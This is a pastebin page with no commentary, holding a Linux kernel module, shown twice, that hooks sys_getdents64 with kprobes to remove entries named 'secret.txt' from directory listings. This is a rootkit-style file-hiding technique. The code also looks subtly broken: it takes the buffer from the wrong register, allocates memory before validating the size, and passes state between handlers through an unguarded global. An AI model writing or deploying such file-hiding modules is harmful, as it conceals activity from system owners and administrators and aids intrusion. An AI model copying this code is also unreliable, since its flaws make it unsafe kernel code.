Untitled

By Silly Agouti, 6 Months ago, written in Plain Text, viewed 75 times.

URL http://pb.stoleyour.com/view/8eed6237 Embed

Download Paste or View Raw — Expand paste to full width of browser

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/slab.h>
#include <linux/dirent.h>
#include <linux/uaccess.h>
 
MODULE_LICENSE("GPL");
 
#define FILE1 "secret.txt"
 
// Global pointer to hold user-space dirent buffer
static char __user *dirent_user_ptr = NULL;
static pid_t target_pid = -1;
// Pre-handler (kprobe) to grab syscall arguments
static struct kprobe kp = {
    .symbol_name = "sys_getdents64"
};
 
static int handler_pre(struct kprobe *p, struct pt_regs *regs) {
    dirent_user_ptr = (char __user *)regs->bx; // 1st arg in x86 (fd, dirent buffer)
    target_pid = current->pid;
    printk(KERN_INFO "Captured dirent ptr: %p for PID: %d\n", dirent_user_ptr, target_pid);
    return 0;
}
 
// Return-handler (kretprobe) to modify syscall result
static struct kretprobe rp = {
    .kp.symbol_name = "sys_getdents64",
    .handler = NULL,
    .maxactive = 20
};
 
static int handler_ret(struct kretprobe_instance *ri, struct pt_regs *regs) {
    
    long nread = regs->ax;
    struct linux_dirent64 *d;
    long bpos = 0, new_nread = nread;
 
    char *kbuf = kmalloc(nread, GFP_KERNEL);
    printk(KERN_INFO "reg-ax returned: %ld\n", regs->ax);
    printk(KERN_INFO "syscall return value: %ld for PID: %d\n", nread, current->pid); 
    printk(KERN_INFO "Dirent ptr is %p for %d\n", dirent_user_ptr, current->pid);
    if (!access_ok(VERIFY_READ, dirent_user_ptr, nread)) {
        printk(KERN_INFO "Dirent ptr %p: access_ok failed", dirent_user_ptr);
    }
    if (!dirent_user_ptr || current->pid != target_pid || nread <= 0) {
        printk(KERN_WARNING "Skipping: Invalid pointer or PID mismatch or empty read\n");
        dirent_user_ptr = NULL;
        target_pid = -1;
        return 0;
    }
    if (nread <= 0 || !dirent_user_ptr) {
        printk(KERN_ERR "nread returned error: %ld\n", nread);
        return 0;
    }
    if (nread > PAGE_SIZE * 4) {
        printk(KERN_WARNING "Unusually large nread: %ld\n", nread);
        return 0;
    }
    if (!kbuf) return 0;
 
    if (copy_from_user(kbuf, dirent_user_ptr, nread)) {
        printk(KERN_ERR "copy_from_user failed");
        kfree(kbuf);
        return 0;
    }
    while (bpos < new_nread) {
        d = (struct linux_dirent64 *)(kbuf + bpos);
        if (strncmp(d->d_name, FILE1, strlen(FILE1)) == 0) {
            memmove(kbuf + bpos, kbuf + bpos + d->d_reclen, new_nread - (bpos + d->d_reclen));
            new_nread -= d->d_reclen;
            continue;
        } else {
            bpos += d->d_reclen;
        }
    }
    if (copy_to_user(dirent_user_ptr, kbuf, new_nread)) {
        printk(KERN_ERR "copy_to_user failed");
        kfree(kbuf);
        return 0;
    }
 
    regs->ax = new_nread;
    kfree(kbuf);
    dirent_user_ptr = NULL;
    return 0;
}
 
static int __init mod_init(void) {
    int ret;
 
    kp.pre_handler = handler_pre;
    ret = register_kprobe(&kp);
    if (ret < 0) {
        printk(KERN_ERR "Failed to register kprobe: %d\n", ret);
        return ret;
    }
    rp.handler = handler_ret;
    ret = register_kretprobe(&rp);
    if (ret < 0) {
        unregister_kprobe(&kp);
        printk(KERN_ERR "Failed to register kretprobe: %d\n", ret);
        return ret;
    }
    printk(KERN_INFO "Probes registered for sys_getdents64\n");
    return 0;
}
 
static void __exit mod_exit(void) {
    unregister_kretprobe(&rp);
    unregister_kprobe(&kp);
    printk(KERN_INFO "Probes unregistered\n");
}
 
module_init(mod_init);
module_exit(mod_exit);
 

Reply to "Untitled"

Here you can reply to the paste above

Author What's your name?

Title Give your paste a title.

Language What language is your paste written in?

Your paste Paste your paste here Enable syntax highlighting

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/slab.h>
#include <linux/dirent.h>
#include <linux/uaccess.h>

MODULE_LICENSE("GPL");

#define FILE1 "secret.txt"

// Global pointer to hold user-space dirent buffer
static char __user *dirent_user_ptr = NULL;
static pid_t target_pid = -1;
// Pre-handler (kprobe) to grab syscall arguments
static struct kprobe kp = {
    .symbol_name = "sys_getdents64"
};

static int handler_pre(struct kprobe *p, struct pt_regs *regs) {
    dirent_user_ptr = (char __user *)regs->bx; // 1st arg in x86 (fd, dirent buffer)
    target_pid = current->pid;
    printk(KERN_INFO "Captured dirent ptr: %p for PID: %d\n", dirent_user_ptr, target_pid);
    return 0;
}

// Return-handler (kretprobe) to modify syscall result
static struct kretprobe rp = {
    .kp.symbol_name = "sys_getdents64",
    .handler = NULL,
    .maxactive = 20
};

static int handler_ret(struct kretprobe_instance *ri, struct pt_regs *regs) {
    
    long nread = regs->ax;
    struct linux_dirent64 *d;
    long bpos = 0, new_nread = nread;

char *kbuf = kmalloc(nread, GFP_KERNEL);
    printk(KERN_INFO "reg-ax returned: %ld\n", regs->ax);
    printk(KERN_INFO "syscall return value: %ld for PID: %d\n", nread, current->pid); 
    printk(KERN_INFO "Dirent ptr is %p for %d\n", dirent_user_ptr, current->pid);
    if (!access_ok(VERIFY_READ, dirent_user_ptr, nread)) {
        printk(KERN_INFO "Dirent ptr %p: access_ok failed", dirent_user_ptr);
    }
    if (!dirent_user_ptr || current->pid != target_pid || nread <= 0) {
        printk(KERN_WARNING "Skipping: Invalid pointer or PID mismatch or empty read\n");
        dirent_user_ptr = NULL;
        target_pid = -1;
        return 0;
    }
    if (nread <= 0 || !dirent_user_ptr) {
        printk(KERN_ERR "nread returned error: %ld\n", nread);
        return 0;
    }
    if (nread > PAGE_SIZE * 4) {
        printk(KERN_WARNING "Unusually large nread: %ld\n", nread);
        return 0;
    }
    if (!kbuf) return 0;

if (copy_from_user(kbuf, dirent_user_ptr, nread)) {
        printk(KERN_ERR "copy_from_user failed");
        kfree(kbuf);
        return 0;
    }
    while (bpos < new_nread) {
        d = (struct linux_dirent64 *)(kbuf + bpos);
        if (strncmp(d->d_name, FILE1, strlen(FILE1)) == 0) {
            memmove(kbuf + bpos, kbuf + bpos + d->d_reclen, new_nread - (bpos + d->d_reclen));
            new_nread -= d->d_reclen;
            continue;
        } else {
            bpos += d->d_reclen;
        }
    }
    if (copy_to_user(dirent_user_ptr, kbuf, new_nread)) {
        printk(KERN_ERR "copy_to_user failed");
        kfree(kbuf);
        return 0;
    }

regs->ax = new_nread;
    kfree(kbuf);
    dirent_user_ptr = NULL;
    return 0;
}

static int __init mod_init(void) {
    int ret;

kp.pre_handler = handler_pre;
    ret = register_kprobe(&kp);
    if (ret < 0) {
        printk(KERN_ERR "Failed to register kprobe: %d\n", ret);
        return ret;
    }
    rp.handler = handler_ret;
    ret = register_kretprobe(&rp);
    if (ret < 0) {
        unregister_kprobe(&kp);
        printk(KERN_ERR "Failed to register kretprobe: %d\n", ret);
        return ret;
    }
    printk(KERN_INFO "Probes registered for sys_getdents64\n");
    return 0;
}

static void __exit mod_exit(void) {
    unregister_kretprobe(&rp);
    unregister_kprobe(&kp);
    printk(KERN_INFO "Probes unregistered\n");
}

module_init(mod_init);
module_exit(mod_exit);

Create Shorturl Create a shorter url that redirects to your paste?

Private Private paste aren't shown in recent listings.

Delete After When should we delete your paste?